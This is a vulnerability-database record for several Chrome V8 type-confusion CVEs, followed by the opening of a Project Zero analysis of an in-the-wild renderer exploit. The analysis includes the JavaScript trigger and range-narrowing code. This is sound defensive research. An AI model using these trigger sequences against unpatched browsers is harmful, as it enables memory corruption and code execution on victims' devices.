["cpe:/o:fedoraproject:fedora:29", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:30"], "id": "CVE-2019-5782", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5782", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", 
"cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-01-28T06:04:14", "description": "Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "debiancve", "title": "CVE-2019-13764", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2019-12-10T22:15:00", "id": "DEBIANCVE:CVE-2019-13764", "href": "https://security-tracker.debian.org/tracker/CVE-2019-13764", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T23:33:09", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary 
code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-27T05:29:00", "type": "debiancve", "title": "CVE-2017-5070", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2017-10-27T05:29:00", "id": "DEBIANCVE:CVE-2017-5070", "href": "https://security-tracker.debian.org/tracker/CVE-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-28T06:04:17", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T23:15:00", "type": "debiancve", "title": 
"CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-02-27T23:15:00", "id": "DEBIANCVE:CVE-2020-6418", "href": "https://security-tracker.debian.org/tracker/CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-28T06:04:15", "description": "Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-02-19T17:29:00", "type": "debiancve", "title": "CVE-2019-5782", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2019-02-19T17:29:00", "id": "DEBIANCVE:CVE-2019-5782", "href": "https://security-tracker.debian.org/tracker/CVE-2019-5782", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-02-01T05:17:45", "description": "Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-11T01:22:53", "type": "redhatcve", "title": "CVE-2019-13764", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2023-02-01T05:05:04", "id": "RH:CVE-2019-13764", "href": "https://access.redhat.com/security/cve/cve-2019-13764", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T23:28:07", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via 
a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-06T07:56:11", "type": "redhatcve", "title": "CVE-2017-5070", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2020-08-18T09:11:56", "id": "RH:CVE-2017-5070", "href": "https://access.redhat.com/security/cve/cve-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T08:14:11", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-26T07:44:08", "type": "redhatcve", "title": "CVE-2020-6418", "bulletinFamily": "info", 
"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2023-02-01T05:37:35", "id": "RH:CVE-2020-6418", "href": "https://access.redhat.com/security/cve/cve-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T05:20:32", "description": "Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-01-30T10:19:58", "type": "redhatcve", "title": "CVE-2019-5782", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2019-5782"], "modified": "2023-02-01T05:15:55", "id": "RH:CVE-2019-5782", "href": "https://access.redhat.com/security/cve/cve-2019-5782", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-07-07T00:13:22", "description": "# CVE-2019-13764\n\n## A full exploit written by Haboob Research T...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-27T08:30:00", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2022-07-06T23:37:53", "id": "882A81DB-33F9-5A22-8935-CC00EA6D1412", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-29T06:47:00", "description": "# CVE_2020_6418_PoC\nfor \u4f9b\u990a\n\nSandbox escape exploit not included....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-13T07:32:24", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2022-04-29T02:54:21", "id": "D253294E-AE35-5B65-8B7D-17D007162D00", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T04:42:58", "description": "https://googleprojectzero.blogspot.com/2019/04/virtually-unlimit...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-18T21:57:26", "type": "githubexploit", "title": "Exploit for CVE-2019-13768", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13768", "CVE-2019-5782", "CVE-2019-7582"], "modified": "2022-03-23T02:20:39", "id": "D5119FBA-40A2-5447-A4DA-EFDF665F9D0D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "googleprojectzero": [{"lastseen": "2021-01-13T07:24:00", "description": "
This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

### Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like `a + b` the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads.
If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; `Math.random()` always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

```javascript
a = Math.min(a, 1);
if (a > 2) {
  return 3;
}
```

Now, imagine there’s an issue that makes TurboFan believe that the function `vuln()` returns a value in the range [0; 2] whereas its actual range is [0; 4].
Consider the code below:

```javascript
a = vuln(a);
let array = [1, 2, 3];
return array[a];
```

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that, at a certain optimization phase, can be expressed by the following pseudocode:

```javascript
if (a >= array.length) {
  deoptimize();
}
let elements = array.[[elements]];
return elements.get(a);
```

`get()` acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.

The bug class outlined above is the main subject of this blog post, and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is [the off-by-one issue in the typer rule for String.indexOf](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>) found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access, because it’s possible to make the compiler propagate the error.
For example, if `vuln()` returns an unexpected boolean value, we can easily transform it into an unexpected integer:

```javascript
a = vuln(a);   // predicted = false; actual = true
a = a * 10;    // predicted = 0; actual = 10
let array = [1, 2, 3];
return array[a];
```

Another [notable bug report](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1710>) by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his [full-chain Chrome exploit](<https://googleprojectzero.blogspot.com/2019/04/virtually-unlimited-memory-escaping.html>). The bug class has made an appearance at several [CTFs](<https://www.jaybosamiya.com/blog/2019/01/02/krautflare/>) and [exploit competitions](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>). As a result, last year the V8 team issued [a hardening patch](<https://bugs.chromium.org/p/v8/issues/detail?id=8806>) designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

### Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of [induction variables](<https://en.wikipedia.org/wiki/Induction_variable>).
The slightly abridged source code below is taken from the [latest affected revision](<https://chromium.googlesource.com/v8/v8.git/+/0da7ca8781c6c7ec852bef845b72ca7f212cdc23/src/compiler/typer.cc>) of V8:

```cpp
Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {
  [...]
  // We only handle integer induction variables (otherwise ranges
  // do not apply and we cannot do anything).
  if (!initial_type.Is(typer_->cache_->kInteger) ||
      !increment_type.Is(typer_->cache_->kInteger)) {
    // Fallback to normal phi typing, but ensure monotonicity.
    // (Unfortunately, without baking in the previous type,
    // monotonicity might be violated because we might not yet have
    // retyped the incrementing operation even though the increment's
    // type might been already reflected in the induction variable
    // phi.)
    Type type = NodeProperties::IsTyped(node)
                    ? NodeProperties::GetType(node)
                    : Type::None();
    for (int i = 0; i < arity; ++i) {
      type = Type::Union(type, Operand(node, i), zone());
    }
    return type;
  }
  // If we do not have enough type information for the initial value
  // or the increment, just return the initial value's type.
  if (initial_type.IsNone() ||
      increment_type.Is(typer_->cache_->kSingletonZero)) {
    return initial_type;
  }
  [...]
  InductionVariable::ArithmeticType arithmetic_type =
      induction_var->Type();
  double min = -V8_INFINITY;
  double max = V8_INFINITY;
  double increment_min;
  double increment_max;
  if (arithmetic_type ==
      InductionVariable::ArithmeticType::kAddition) {
    increment_min = increment_type.Min();
    increment_max = increment_type.Max();
  } else {
    DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction,
              arithmetic_type);
    increment_min = -increment_type.Max();
    increment_max = -increment_type.Min();
  }
  if (increment_min >= 0) {
    // increasing sequence
    min = initial_type.Min();
    for (auto bound : induction_var->upper_bounds()) {
      Type bound_type = TypeOrNone(bound.bound);
      // If the type is not an integer, just skip the bound.
      if (!bound_type.Is(typer_->cache_->kInteger)) continue;
      // If the type is not inhabited, then we can take the initial
      // value.
      if (bound_type.IsNone()) {
        max = initial_type.Max();
        break;
      }
      double bound_max = bound_type.Max();
      if (bound.kind == InductionVariable::kStrict) {
        bound_max -= 1;
      }
      max = std::min(max, bound_max + increment_max);
    }
    // The upper bound must be at least the initial value's upper
    // bound.
    max = std::max(max, initial_type.Max());
  } else if (increment_max <= 0) {
    // decreasing sequence
    [...]
  } else {
    // Shortcut: If the increment can be both positive and negative,
    // the variable can go arbitrarily far, so just return integer.
    return typer_->cache_->kInteger;
  }
  [...]
  return Type::Range(min, max, typer_->zone());
}
```

Now, imagine the compiler processing the following JavaScript code:

```javascript
for (var i = initial; i < bound; i += increment) { [...] }
```

In short, when the loop has been identified as increasing, the lower bound of `initial` becomes the lower bound of `i`, and the upper bound is calculated as the sum of the upper bounds of `bound` and `increment` (minus one for a strict comparison). There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the [static single assignment](<https://en.wikipedia.org/wiki/Static_single_assignment_form>) form.

Note that the algorithm only works with integers; otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory.
The type holds two unusual properties that have made the vulnerability possible:

 * +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
 * The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.

Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

```javascript
for (var i = -Infinity; i < 0; i += Infinity) { }
```

This one line is enough to trigger the issue. The exploit author had to make only two minor changes: (1) parametrize `increment` in order to make the value of `i` match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

```javascript
function trigger(argument) {
  var j = 0;
  var increment = 100;
  if (argument > 2) {
    increment = Infinity;
  }
  for (var i = -Infinity; i <= -Infinity; i += increment) {
    j++;
    if (j == 20) {
      break;
    }
  }
  [...]
```

The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.

### Exploitation

The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors.
For the ease of the reader, we’ve modified it to be compatible with x64 as well.

```javascript
[...]
// The comments display the current value of the variable i, the type
// inferred by the compiler, and the machine type used to store
// the value at each step.

// Initially:
// actual = NaN, inferred = (-Infinity, +Infinity)
// representation = double
i = Math.max(i, 0x100000800);
// After step one:
// actual = NaN, inferred = [0x100000800; +Infinity)
// representation = double
i = Math.min(0x100000801, i);
// After step two:
// actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]
// representation = int64_t
i -= 0x1000007fa;
// After step three:
// actual = -2042, inferred = [6, 7]
// representation = int32_t
i >>= 1;
// After step four:
// actual = -1021, inferred = 3
// representation = int32_t
i += 10;
// After step five:
// actual = -1011, inferred = 13
// representation = int32_t
[...]
```

The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for `i` at this point is a 64-bit integer, as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the [“indefinite integer value”](<https://www.felixcloutier.com/x86/cvttss2si>) -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of `i`, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two.
The answer lies in the optimization pass called the constant-folding reducer.

```cpp
Reduction ConstantFoldingReducer::Reduce(Node* node) {
  DisallowHeapAccess no_heap_access;
  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
      node->op()->HasProperty(Operator::kEliminatable) &&
      node->opcode() != IrOpcode::kFinishRegion) {
    Node* constant = TryGetConstant(jsgraph(), node);
    if (constant != nullptr) {
      ReplaceWithValue(node, constant);
      return Replace(constant);
  [...]
```

If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant, thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore are not marked as eliminatable.

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass, even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

```cpp
Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {
  [...]
  } else if (arity == 1) {
    Node* length = NodeProperties::GetValueInput(node, 2);
    Type length_type = NodeProperties::GetType(length);
    if (!length_type.Maybe(Type::Number())) {
      // Handle the single argument case, where we know that the value
      // cannot be a valid Array length.
      elements_kind = GetMoreGeneralElementsKind(
          elements_kind, IsHoleyElementsKind(elements_kind)
                             ? HOLEY_ELEMENTS
                             : PACKED_ELEMENTS);
      return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,
                            elements_kind, allocation,
                            slack_tracking_prediction);
    }
    if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&
        length_type.Max() <= kElementLoopUnrollLimit &&
        length_type.Min() == length_type.Max()) {
      int capacity = static_cast<int>(length_type.Max());
      return ReduceNewArray(node, length, capacity, *initial_map,
                            elements_kind, allocation,
                            slack_tracking_prediction);
  [...]
```

